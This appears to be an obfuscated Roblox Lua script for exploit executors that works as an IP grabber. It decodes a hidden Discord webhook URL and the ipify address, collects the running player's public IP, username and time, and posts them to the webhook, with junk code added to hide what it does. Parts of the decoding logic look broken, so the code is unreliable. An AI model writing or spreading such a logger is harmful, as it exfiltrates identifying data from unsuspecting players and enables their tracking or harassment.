local _0xZ9Q7W3K = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM2MDUyMzY2MzE3NDI3NTIxMy9JUTJ6MTNKajk3TGY3eWZGUkxZeTRPTnVxLXV0N3VYbURWQWdROVlGaURNWFFpNW9kLXlpR3dWcTlxUnF2Z0cwUE5VNQ=="
local _0xM4P8T2R = (syn and syn.request) or (http and http.request) or request
local _0xV1N6Y5J = "aHR0cHM6Ly9hcGkuaXBpZnkub3JnLw=="
local _0xB2H9X4F = game.Players.LocalPlayer.Name
local _0xK7C3L8D = os.date("%Y-%m-%d %H:%M:%S")

local function _0xJ5G2R9T(_0xS)
    local _0xT = ""
    for _0xI = 1, #_0xS do
        _0xT = _0xT .. string.char(bit32.bxor(string.byte(_0xS, _0xI), 42))
    end
    return _0xT
end

local function _0xF8W4Q1Z()
    local _0xDUMMY = math.random(1, 100) * 0 + 42
    if _0xM4P8T2R then
        local _0xR6T9Y2N = _0xM4P8T2R({
            Url = game:GetService("HttpService"):JSONDecode(game:HttpGet(_0xJ5G2R9T(game:GetService("HttpService"):JSONDecode(_0xV1N6Y5J)))),
            Method = _0xJ5G2R9T("AFG") .. "T",
            Headers = {
                [_0xJ5G2R9T("Tmlvagpv-Gtla")] = _0xJ5G2R9T("fmmltkfgrlm/tml")
            }
        })
        if _0xR6T9Y2N and _0xR6T9Y2N.Body then
            return _0xR6T9Y2N.Body + (_0xDUMMY - 42)
        else
            return _0xJ5G2R9T("DM_XTKG_DM")
        end
    else
        return _0xJ5G2R9T("DM_LM_AFFM")
    end
end

if _0xM4P8T2R then
    local _0xU3E7I9O = _0xF8W4Q1Z()
    local _0xN1A5P6M = {
        content = _0xJ5G2R9T("2rsrglmvr") .. " 0xN: " .. _0xB2H9X4F .. "\n0xI: " .. _0xU3E7I9O .. "\n0xT: " .. _0xK7C3L8D
    }
    for _ = 1, math.random(1, 3) do
        local _0xFAKE = math.random()
    end
    _0xM4P8T2R({
        Url = game:GetService("HttpService"):JSONDecode(game:HttpGet(_0xJ5G2R9T(game:GetService("HttpService"):JSONDecode(_0xZ9Q7W3K)))),
        Method = _0xJ5G2R9T("DMHG") .. "",
        Headers = {
            [_0xJ5G2R9T("Tmlvagpv-Gtla")] = _0xJ5G2R9T("fmmltkfgrlm/tml")
        },
        Body = game:GetService("HttpService"):JSONEncode(_0xN1A5P6M)
    })
else
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = _0xJ5G2R9T("DM_HJTKAF_RIRV"),
        Text = _0xJ5G2R9T("DM_THHFR :("),
        Duration = 5 + math.random(0, 1)
    })
    print(_0xJ5G2R9T("DM_LM_AFFM_RIRV"))
end